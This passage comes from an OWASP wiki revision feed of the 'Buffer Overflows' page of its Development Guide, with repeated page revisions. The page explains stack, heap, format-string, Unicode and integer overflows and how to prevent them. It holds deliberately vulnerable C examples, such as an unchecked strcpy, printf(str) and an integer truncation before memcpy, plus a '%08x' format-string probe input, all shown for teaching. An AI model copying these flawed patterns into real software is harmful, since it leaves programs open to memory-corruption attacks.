&amp;lt;u&amp;gt;http://en.wikipedia.org/wiki/NX_bit&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Horizon, ''How to bypass Solaris no execute stack protection''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.secinf.net/unix_security/How_to_bypass_Solaris_nonexecutable_stack_protection_.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Alexander Anisimov, ''Defeating Microsoft Windows XP SP2 Heap protection and DEP bypass'', Positive Technologies&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.maxpatrol.com/defeating-xpsp2-heap-protection.htm&amp;lt;/u&amp;gt; [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* Blexim, ''Basic Integer Overflows''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.phrack.org/phrack/60/p60-0x0a.txt&amp;lt;/u&amp;gt; [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* StackShield&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.angelfire.com/sk/stackshield/index.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* StackGuard&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.immunix.org&amp;lt;/u&amp;gt;[[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* Libsafe&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.research.avayalabs.com/project/libsafe&amp;lt;/u&amp;gt; [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Buffer_Overflows&amp;diff=59855</id>
		<title>Buffer Overflows</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Buffer_Overflows&amp;diff=59855"/>
				<updated>2009-05-02T11:47:04Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Further reading */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]__TOC__'''&lt;br /&gt;
&lt;br /&gt;
==Objective ==&lt;br /&gt;
&lt;br /&gt;
To ensure that:&lt;br /&gt;
&lt;br /&gt;
* Applications do not expose themselves to faulty components.&lt;br /&gt;
&lt;br /&gt;
* Applications create as few buffer overflows as possible.&lt;br /&gt;
&lt;br /&gt;
* Developers are encouraged to use languages and frameworks that are relatively immune to buffer overflows.&lt;br /&gt;
&lt;br /&gt;
==Platforms Affected ==&lt;br /&gt;
&lt;br /&gt;
Almost every platform, with the following notable exceptions:&lt;br /&gt;
&lt;br /&gt;
* Java/J2EE – as long as native methods or system calls are not invoked.&lt;br /&gt;
&lt;br /&gt;
* .NET – as long as unsafe or unmanaged code is not invoked (such as the use of P/Invoke or COM Interop).&lt;br /&gt;
&lt;br /&gt;
* PHP, Python, Perl – as long as external programs or vulnerable extensions are not used.&lt;br /&gt;
&lt;br /&gt;
==Relevant COBIT Topics ==&lt;br /&gt;
&lt;br /&gt;
DS11.9 – Data processing integrity.&lt;br /&gt;
&lt;br /&gt;
==Description ==&lt;br /&gt;
&lt;br /&gt;
Attackers generally use [[Buffer Overflow|buffer overflows]] to corrupt the execution stack of a web application. By sending carefully crafted input to a web application, an attacker can cause the web application to execute arbitrary code, possibly taking over the machine. Attackers have managed to identify buffer overflows in a staggering array of products and components. &lt;br /&gt;
&lt;br /&gt;
Buffer overflow flaws can be present in both the web server and application server products that serve the static and dynamic portions of a site, or in the web application itself. Buffer overflows found in commonly-used server products are likely to become widely known and can pose a significant risk to users of these products. When web applications use libraries, such as a graphics library to generate images or a communications library to send e-mail, they open themselves to potential buffer overflow attacks. Literature detailing buffer overflow attacks against commonly-used products is readily available, and newly discovered vulnerabilities are reported almost daily. &lt;br /&gt;
&lt;br /&gt;
Buffer overflows can also be found in custom web application code, and may even be more likely, given the lack of scrutiny that web applications typically go through. Buffer overflow attacks against customized web applications can sometimes lead to interesting results. In some cases, we have discovered that sending large inputs can cause the web application or the back-end database to malfunction. It is possible to cause a denial of service attack against the web site, depending on the severity and specific nature of the flaw. Overly large inputs could cause the application to display a detailed error message, potentially leading to a successful attack on the system.&lt;br /&gt;
&lt;br /&gt;
Buffer overflow attacks generally rely upon two techniques, often used in combination:&lt;br /&gt;
&lt;br /&gt;
* Writing data to particular memory addresses&lt;br /&gt;
&lt;br /&gt;
* Having the operating system mishandle data types&lt;br /&gt;
&lt;br /&gt;
This means that strongly-typed programming languages (and environments) that disallow direct memory access usually prevent buffer overflows from happening.&lt;br /&gt;
&lt;br /&gt;
{| border=1&lt;br /&gt;
|-&lt;br /&gt;
! Language/Environment !! Compiled or Interpreted !! Strongly Typed !! Direct Memory Access !! Safe or Unsafe&lt;br /&gt;
|-&lt;br /&gt;
| Java, Java Virtual Machine (JVM) || Both || Yes || No || Safe&lt;br /&gt;
|-&lt;br /&gt;
| .NET || Both || Yes || No || Safe&lt;br /&gt;
|-&lt;br /&gt;
| Perl || Both || Yes || No || Safe&lt;br /&gt;
|-&lt;br /&gt;
| Python || Interpreted || Yes || No || Safe&lt;br /&gt;
|-&lt;br /&gt;
| Ruby || Interpreted || Yes || No || Safe&lt;br /&gt;
|-&lt;br /&gt;
| C/C++ || Compiled || No || Yes || Unsafe&lt;br /&gt;
|-&lt;br /&gt;
| Assembly || Compiled || No || Yes || Unsafe&lt;br /&gt;
|-&lt;br /&gt;
| COBOL || Compiled || Yes || No || Safe&lt;br /&gt;
|}&lt;br /&gt;
Table 8.1: Language descriptions&lt;br /&gt;
&lt;br /&gt;
==General Prevention Techniques ==&lt;br /&gt;
&lt;br /&gt;
A number of general techniques to prevent buffer overflows include:&lt;br /&gt;
&lt;br /&gt;
* Code auditing (automated or manual)&lt;br /&gt;
&lt;br /&gt;
* Developer training – bounds checking, use of unsafe functions, and group standards&lt;br /&gt;
&lt;br /&gt;
* Non-executable stacks – many operating systems have at least some support for this&lt;br /&gt;
&lt;br /&gt;
* Compiler tools – StackShield, StackGuard, and Libsafe, among others&lt;br /&gt;
&lt;br /&gt;
* Safe functions – use strncat instead of strcat, strncpy instead of strcpy, etc&lt;br /&gt;
&lt;br /&gt;
* Patches – Be sure to keep your web and application servers fully patched, and be aware of bug reports relating to applications upon which your code is dependent.&lt;br /&gt;
&lt;br /&gt;
* Periodically scan your application with one or more of the commonly available scanners that look for buffer overflow flaws in your server products and your custom web applications. &lt;br /&gt;
&lt;br /&gt;
==Stack Overflow ==&lt;br /&gt;
&lt;br /&gt;
Stack overflows are the best understood and the most common form of buffer overflow. The basics of a stack overflow are simple:&lt;br /&gt;
&lt;br /&gt;
* There are two buffers: a source buffer containing arbitrary input (presumably from the attacker), and a destination buffer that is too small for the attack input. The destination buffer resides on the stack, adjacent to the function return address.&lt;br /&gt;
&lt;br /&gt;
* The faulty code does ''not'' check whether the source data fits in the destination buffer. It copies the attack input to the destination buffer, overwriting adjacent information on the stack (such as the function return address).&lt;br /&gt;
&lt;br /&gt;
* When the function returns, the CPU unwinds the stack frame and pops the (now modified) return address from the stack.&lt;br /&gt;
&lt;br /&gt;
* Control does not return to the function as it should. Instead, arbitrary code (chosen by the attacker when crafting the initial input) is executed. &lt;br /&gt;
&lt;br /&gt;
The following example, written in C, demonstrates a stack overflow exploit.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;string.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
void f(char* s) {&lt;br /&gt;
    char buffer[10];&lt;br /&gt;
    strcpy(buffer, s);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
void main(void) {&lt;br /&gt;
    f(&amp;quot;01234567890123456789&amp;quot;);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
[root /tmp]# ./stacktest&lt;br /&gt;
&lt;br /&gt;
Segmentation fault&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
If your program:&lt;br /&gt;
&lt;br /&gt;
* is written in a language (or depends upon a program that is written in a language) that allows buffer overflows to be created (see Table 8.1) AND&lt;br /&gt;
&lt;br /&gt;
* copies data from one buffer on the stack to another without checking sizes first AND&lt;br /&gt;
&lt;br /&gt;
* does not use techniques such as canary values or non-executable stacks to prevent buffer overflows THEN&lt;br /&gt;
&lt;br /&gt;
it is likely that the application is vulnerable to attack.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
# Deploy on systems capable of using non-executable stacks, such as:&lt;br /&gt;
## AMD and Intel x86-64 chips with associated 64-bit operating systems&lt;br /&gt;
## Windows XP SP2 (both 32- and 64-bit)&lt;br /&gt;
## Windows 2003 SP1 (both 32- and 64-bit)&lt;br /&gt;
## Linux after 2.6.8 on AMD and x86-64 processors in 32- and 64-bit mode&lt;br /&gt;
## OpenBSD (w^x on Intel, AMD, SPARC, Alpha and PowerPC)&lt;br /&gt;
## Solaris 2.6 and later with the “noexec_user_stack” flag enabled&lt;br /&gt;
# Use higher-level programming languages that are strongly typed and that disallow direct memory access. &lt;br /&gt;
# Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing &amp;quot;junk&amp;quot; characters, etc. &lt;br /&gt;
# If relying upon operating system functions or utilities written in a vulnerable language, ensure that they:&lt;br /&gt;
## use the principle of least privilege&lt;br /&gt;
## use compilers that protect against stack and heap overflows&lt;br /&gt;
## are current in terms of patches&lt;br /&gt;
&lt;br /&gt;
==Heap Overflow ==&lt;br /&gt;
&lt;br /&gt;
Heap overflows are problematic in that non-executable stack protections do not prevent them. A heap is an area of memory allocated by the application at run-time to store data. The following example, written in C, shows a heap overflow.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;unistd.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;string.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #define BSIZE 16&lt;br /&gt;
 #define OVERSIZE 8 /* overflow buf1 by OVERSIZE bytes */&lt;br /&gt;
&lt;br /&gt;
 void main(void) {&lt;br /&gt;
    u_long b_diff;&lt;br /&gt;
    char *buf0 = (char*)malloc(BSIZE);		// create two buffers&lt;br /&gt;
    char *buf1 = (char*)malloc(BSIZE);&lt;br /&gt;
&lt;br /&gt;
    b_diff = (u_long)buf1 - (u_long)buf0;	// difference between locations&lt;br /&gt;
    printf(&amp;quot;Initial values:  &amp;quot;);&lt;br /&gt;
    printf(&amp;quot;buf0=%p, buf1=%p, b_diff=0x%x bytes\n&amp;quot;, buf0, buf1, b_diff);&lt;br /&gt;
&lt;br /&gt;
    memset(buf1, 'A', BSIZE-1), buf1[BSIZE-1] = '\0';&lt;br /&gt;
    printf(&amp;quot;Before overflow: buf1=%s\n&amp;quot;, buf1);&lt;br /&gt;
&lt;br /&gt;
    memset(buf0, 'B', (u_int)(b_diff + OVERSIZE));	// overflow buf0 into buf1&lt;br /&gt;
    printf(&amp;quot;After overflow:  buf1=%s\n&amp;quot;, buf1);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
[root /tmp]# ./heaptest&lt;br /&gt;
&lt;br /&gt;
Initial values:  buf0=0x9322008, buf1=0x9322020, b_diff=0x18 bytes&lt;br /&gt;
Before overflow: buf1=AAAAAAAAAAAAAAA&lt;br /&gt;
After overflow:  buf1=BBBBBBBBAAAAAAA&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The simple program above shows two buffers being allocated on the heap, with the first buffer being overflowed to overwrite the contents of the second buffer. &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
If your program:&lt;br /&gt;
&lt;br /&gt;
* is written in a language (or depends upon a program that is written in a language)  that allows buffer overflows to be created (see Table 8.1) AND&lt;br /&gt;
&lt;br /&gt;
* copies data from one buffer on the stack to another without checking sizes first AND&lt;br /&gt;
&lt;br /&gt;
* does not use techniques such as canary values to prevent buffer overflows THEN&lt;br /&gt;
&lt;br /&gt;
it is likely that the application is vulnerable to attack.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
# Use higher-level programming languages that are strongly typed and that disallow direct memory access. &lt;br /&gt;
# Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing &amp;quot;junk&amp;quot; characters, etc. &lt;br /&gt;
# If relying upon operating system functions or utilities written in a vulnerable language, ensure that they:&lt;br /&gt;
## use the principle of least privilege&lt;br /&gt;
## use compilers that protect against stack and heap overflows&lt;br /&gt;
## are current in terms of patches&lt;br /&gt;
&lt;br /&gt;
==Format String ==&lt;br /&gt;
&lt;br /&gt;
Format string buffer overflows (usually called &amp;quot;format string vulnerabilities&amp;quot;) are highly specialized buffer overflows that can have the same effects as other buffer overflow attacks. Basically, format string vulnerabilities take advantage of the mixture of data and control information in certain functions, such as C/C++'s printf. The easiest way to understand this class of vulnerability is with an example:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
#include &amp;lt;unistd.h&amp;gt;&lt;br /&gt;
#include &amp;lt;string.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
void main(void) {&lt;br /&gt;
    char str[100];&lt;br /&gt;
    scanf(&amp;quot;%99s&amp;quot;, str);&lt;br /&gt;
    printf(&amp;quot;%s&amp;quot;, str);&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This simple program takes input from the user and displays it back on the screen. The string &amp;lt;code&amp;gt;%s&amp;lt;/code&amp;gt; means that the other parameter, str, should be displayed as a string. This example is ''not'' vulnerable to a format string attack, but if one changes the last line, it becomes exploitable:&lt;br /&gt;
&lt;br /&gt;
    printf(str);&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
To see how, consider the user entering the special input:&lt;br /&gt;
&lt;br /&gt;
''%08x.%08x.%08x.%08x.%08x''&lt;br /&gt;
&lt;br /&gt;
By constructing input as such, the program can be exploited to print the first five entries from the stack.  &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
If your program:&lt;br /&gt;
&lt;br /&gt;
* uses functions such as printf or snprintf directly, or indirectly through system services (such as syslog) or other libraries, AND&lt;br /&gt;
&lt;br /&gt;
* passes user input to such functions in a way that allows control information in the input to be interpreted by the function itself, THEN&lt;br /&gt;
&lt;br /&gt;
it is highly likely that the application is vulnerable to attack.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
# Use higher-level programming languages that are strongly typed and that disallow direct memory access. &lt;br /&gt;
# Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing &amp;quot;junk&amp;quot; characters, etc. Specifically check for control information (meta-characters like '%')&lt;br /&gt;
# Avoid the use of functions like printf that allow user input to contain control information&lt;br /&gt;
# If relying upon operating system functions or utilities written in a vulnerable language, ensure that they:&lt;br /&gt;
## use the principle of least privilege&lt;br /&gt;
## use compilers that protect against stack and heap overflows&lt;br /&gt;
## are current in terms of patches&lt;br /&gt;
&lt;br /&gt;
==Unicode Overflow ==&lt;br /&gt;
&lt;br /&gt;
Unicode exploits are more difficult to perform than typical buffer overflows, as demonstrated in Anley’s 2002 paper, but it is wrong to assume that using Unicode protects you against buffer overflows. Examples of Unicode overflows include Code Red, a devastating worm with an estimated economic cost in the billions of dollars.&lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
If your program:&lt;br /&gt;
&lt;br /&gt;
* is written in a language (or depends upon a program that is written in a language) that allows buffer overflows to be created (see Table 8.1) AND&lt;br /&gt;
&lt;br /&gt;
* takes Unicode input from a user AND&lt;br /&gt;
&lt;br /&gt;
* fails to sanitize the input AND&lt;br /&gt;
&lt;br /&gt;
* does not use techniques such as canary values to prevent buffer overflows THEN&lt;br /&gt;
&lt;br /&gt;
it is highly likely that the application is vulnerable to attack.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself  ===&lt;br /&gt;
&lt;br /&gt;
# Deploy on systems capable of using non-executable stacks, such as:&lt;br /&gt;
## AMD and Intel x86-64 chips with associated 64-bit operating systems&lt;br /&gt;
## Windows XP SP2 (both 32- and 64-bit)&lt;br /&gt;
## Windows 2003 SP1 (both 32- and 64-bit)&lt;br /&gt;
## Linux after 2.6.8 on AMD and x86-64 processors in 32- and 64-bit mode&lt;br /&gt;
## OpenBSD (w^x on Intel, AMD, SPARC, Alpha and PowerPC)&lt;br /&gt;
## Solaris 2.6 and later with the “noexec_user_stack” flag enabled&lt;br /&gt;
# Use higher-level programming languages that are strongly typed and that disallow direct memory access. &lt;br /&gt;
# Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing &amp;quot;junk&amp;quot; characters, etc. &lt;br /&gt;
# If relying upon operating system functions or utilities written in a vulnerable language, ensure that they:&lt;br /&gt;
## use the principle of least privilege&lt;br /&gt;
## use compilers that protect against stack and heap overflows&lt;br /&gt;
## are current in terms of patches&lt;br /&gt;
&lt;br /&gt;
==Integer Overflow ==&lt;br /&gt;
&lt;br /&gt;
When an application takes two numbers of fixed word size and performs an operation on them, the result may not fit within the same word size. For example, if the two 8-bit numbers 192 and 208 are added together and the result stored in another 8-bit byte, the sum (400) will not fit into an 8-bit result:&lt;br /&gt;
&lt;br /&gt;
''         1100 0000''&lt;br /&gt;
&lt;br /&gt;
''  +      1101 0000''&lt;br /&gt;
&lt;br /&gt;
''  = 0001 1001 0000''&lt;br /&gt;
&lt;br /&gt;
Depending on the language and platform, such an operation may raise an exception or may simply wrap around silently; your application must be coded to detect the condition and take proper action. Otherwise, your application will report that 192 + 208 equals 144.&lt;br /&gt;
&lt;br /&gt;
The following code demonstrates an integer overflow that leads to a buffer overflow; it was adapted from [http://www.phrack.org/phrack/60/p60-0x0a.txt Blexim's Phrack article]: [[Category:FIXME|broken link]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
#include &amp;lt;string.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
void main(int argc, char *argv[]) {&lt;br /&gt;
    int i = atoi(argv[1]);         // input from user&lt;br /&gt;
    unsigned short s = i;          // truncate to a short&lt;br /&gt;
    char buf[50];                  // large buffer&lt;br /&gt;
&lt;br /&gt;
    if (s &amp;gt; 10) {                  // check we're not greater than 10&lt;br /&gt;
        return;&lt;br /&gt;
    }&lt;br /&gt;
&lt;br /&gt;
    memcpy(buf, argv[2], i);       // copy i bytes to the buffer&lt;br /&gt;
    buf[i] = '\0';                 // add a null byte to the buffer&lt;br /&gt;
    printf(&amp;quot;%s\n&amp;quot;, buf);           // output the buffer contents&lt;br /&gt;
&lt;br /&gt;
    return;&lt;br /&gt;
} &lt;br /&gt;
&lt;br /&gt;
[root /tmp]# ./inttest 65580 foobar&lt;br /&gt;
Segmentation fault&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The above code is exploitable because the validation is performed not on the input value (65580) but on its value after truncation to an unsigned short (44). The check on s passes, yet memcpy copies the full 65580 bytes.&lt;br /&gt;
&lt;br /&gt;
Integer overflows can be a problem in any language and can be exploited when integers are used in array indices and implicit short math operations. &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Examine use of signed integers, bytes, and shorts.&lt;br /&gt;
&lt;br /&gt;
* Are there cases where these values are used as array indices after performing an arithmetic operation (+, -, *, /, or % (modulo))?&lt;br /&gt;
&lt;br /&gt;
* How would your program react to a negative or zero value for integer values, particularly during array lookups?&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* If using .NET, use David LeBlanc’s SafeInt class or a similar construct. Otherwise, use a &amp;quot;BigInteger&amp;quot; or &amp;quot;BigDecimal&amp;quot; implementation in cases where it would be hard to validate input yourself.&lt;br /&gt;
&lt;br /&gt;
* If your compiler supports the option, change the default for integers to be unsigned unless otherwise explicitly stated. Use unsigned integers whenever you don't need negative values.&lt;br /&gt;
&lt;br /&gt;
* Use range checking if your language or framework supports it, or be sure to implement range checking yourself after all arithmetic operations.&lt;br /&gt;
&lt;br /&gt;
* Be sure to check for exceptions if your language supports it.&lt;br /&gt;
&lt;br /&gt;
==Further reading ==&lt;br /&gt;
&lt;br /&gt;
* Team Teso, ''Exploiting Format String Vulnerabilities''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.cs.ucsb.edu/~jzhou/security/formats-teso.html&amp;lt;/u&amp;gt; [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* Newsham, Tim, ''Format String Attacks''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.lava.net/~newsham/format-string-attacks.pdf&amp;lt;/u&amp;gt;  [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* w00w00 and Matt Conover, ''Preliminary Heap Overflow Tutorial''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.w00w00.org/files/articles/heaptut.txt&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Chris Anley, ''Creating Arbitrary Shellcode In Unicode Expanded Strings''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.ngssoftware.com/papers/unicodebo.pdf&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* David LeBlanc, ''Integer Handling with the C++ SafeInt Class''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dncode/html/secure01142004.asp&amp;lt;/u&amp;gt;     &lt;br /&gt;
&lt;br /&gt;
* Aleph One, ''Smashing the Stack for fun and profit''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.phrack.org/phrack/49/P49-14&amp;lt;/u&amp;gt;  [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* Mark Donaldson, ''Inside the buffer Overflow Attack: Mechanism, method, &amp;amp; prevention''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://rr.sans.org/code/inside_buffer.php&amp;lt;/u&amp;gt;   [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* ''NX Bit'', Wikipedia article&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://en.wikipedia.org/wiki/NX_bit&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Horizon, ''How to bypass Solaris no execute stack protection''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.secinf.net/unix_security/How_to_bypass_Solaris_nonexecutable_stack_protection_.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Alexander Anisimov, ''Defeating Microsoft Windows XP SP2 Heap protection and DEP bypass'', Positive Technologies&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.maxpatrol.com/defeating-xpsp2-heap-protection.htm&amp;lt;/u&amp;gt; [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* Matt Conover, ''w00w00 on Heap Overflows'', w00w00 Security Team&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.w00w00.org/files/articles/heaptut.txt&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Blexim, ''Basic Integer Overflows''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.phrack.org/phrack/60/p60-0x0a.txt&amp;lt;/u&amp;gt; [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* StackShield&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.angelfire.com/sk/stackshield/index.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* StackGuard&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.immunix.org&amp;lt;/u&amp;gt;[[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* Libsafe&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.research.avayalabs.com/project/libsafe&amp;lt;/u&amp;gt; [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Buffer_Overflows&amp;diff=59854</id>
		<title>Buffer Overflows</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Buffer_Overflows&amp;diff=59854"/>
				<updated>2009-05-02T11:44:21Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Integer Overflow */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]__TOC__&lt;br /&gt;
&lt;br /&gt;
==Objective ==&lt;br /&gt;
&lt;br /&gt;
To ensure that:&lt;br /&gt;
&lt;br /&gt;
* Applications do not expose themselves to faulty components.&lt;br /&gt;
&lt;br /&gt;
* Applications create as few buffer overflows as possible.&lt;br /&gt;
&lt;br /&gt;
* Developers are encouraged to use languages and frameworks that are relatively immune to buffer overflows.&lt;br /&gt;
&lt;br /&gt;
==Platforms Affected ==&lt;br /&gt;
&lt;br /&gt;
Almost every platform, with the following notable exceptions:&lt;br /&gt;
&lt;br /&gt;
* Java/J2EE – as long as native methods or system calls are not invoked.&lt;br /&gt;
&lt;br /&gt;
* .NET – as long as unsafe or unmanaged code is not invoked (such as the use of P/Invoke or COM Interop).&lt;br /&gt;
&lt;br /&gt;
* PHP, Python, Perl – as long as external programs or vulnerable extensions are not used.&lt;br /&gt;
&lt;br /&gt;
==Relevant COBIT Topics ==&lt;br /&gt;
&lt;br /&gt;
DS11.9 – Data processing integrity.&lt;br /&gt;
&lt;br /&gt;
==Description ==&lt;br /&gt;
&lt;br /&gt;
Attackers generally use [[Buffer Overflow|buffer overflows]] to corrupt the execution stack of a web application. By sending carefully crafted input to a web application, an attacker can cause the web application to execute arbitrary code, possibly taking over the machine. Attackers have managed to identify buffer overflows in a staggering array of products and components. &lt;br /&gt;
&lt;br /&gt;
Buffer overflow flaws can be present in both the web server and application server products that serve the static and dynamic portions of a site, or in the web application itself. Buffer overflows found in commonly-used server products are likely to become widely known and can pose a significant risk to users of these products. When web applications use libraries, such as a graphics library to generate images or a communications library to send e-mail, they open themselves to potential buffer overflow attacks. Literature detailing buffer overflow attacks against commonly-used products is readily available, and newly discovered vulnerabilities are reported almost daily. &lt;br /&gt;
&lt;br /&gt;
Buffer overflows can also be found in custom web application code, and may even be more likely, given the lack of scrutiny that web applications typically go through. Buffer overflow attacks against customized web applications can sometimes lead to interesting results. In some cases, we have discovered that sending large inputs can cause the web application or the back-end database to malfunction. It is possible to cause a denial of service attack against the web site, depending on the severity and specific nature of the flaw. Overly large inputs could cause the application to display a detailed error message, potentially leading to a successful attack on the system.&lt;br /&gt;
&lt;br /&gt;
Buffer overflow attacks generally rely upon two techniques, often used in combination:&lt;br /&gt;
&lt;br /&gt;
* Writing data to particular memory addresses&lt;br /&gt;
&lt;br /&gt;
* Having the operating system mishandle data types&lt;br /&gt;
&lt;br /&gt;
This means that strongly-typed programming languages (and environments) that disallow direct memory access usually prevent buffer overflows from happening.&lt;br /&gt;
&lt;br /&gt;
{| border=1&lt;br /&gt;
|-&lt;br /&gt;
! Language/Environment !! Compiled or Interpreted !! Strongly Typed !! Direct Memory Access !! Safe or Unsafe&lt;br /&gt;
|-&lt;br /&gt;
| Java, Java Virtual Machine (JVM) || Both || Yes || No || Safe&lt;br /&gt;
|-&lt;br /&gt;
| .NET || Both || Yes || No || Safe&lt;br /&gt;
|-&lt;br /&gt;
| Perl || Both || Yes || No || Safe&lt;br /&gt;
|-&lt;br /&gt;
| Python || Interpreted || Yes || No || Safe&lt;br /&gt;
|-&lt;br /&gt;
| Ruby || Interpreted || Yes || No || Safe&lt;br /&gt;
|-&lt;br /&gt;
| C/C++ || Compiled || No || Yes || Unsafe&lt;br /&gt;
|-&lt;br /&gt;
| Assembly || Compiled || No || Yes || Unsafe&lt;br /&gt;
|-&lt;br /&gt;
| COBOL || Compiled || Yes || No || Safe&lt;br /&gt;
|}&lt;br /&gt;
Table 8.1: Language descriptions&lt;br /&gt;
&lt;br /&gt;
==General Prevention Techniques ==&lt;br /&gt;
&lt;br /&gt;
A number of general techniques to prevent buffer overflows include:&lt;br /&gt;
&lt;br /&gt;
* Code auditing (automated or manual)&lt;br /&gt;
&lt;br /&gt;
* Developer training – bounds checking, use of unsafe functions, and group standards&lt;br /&gt;
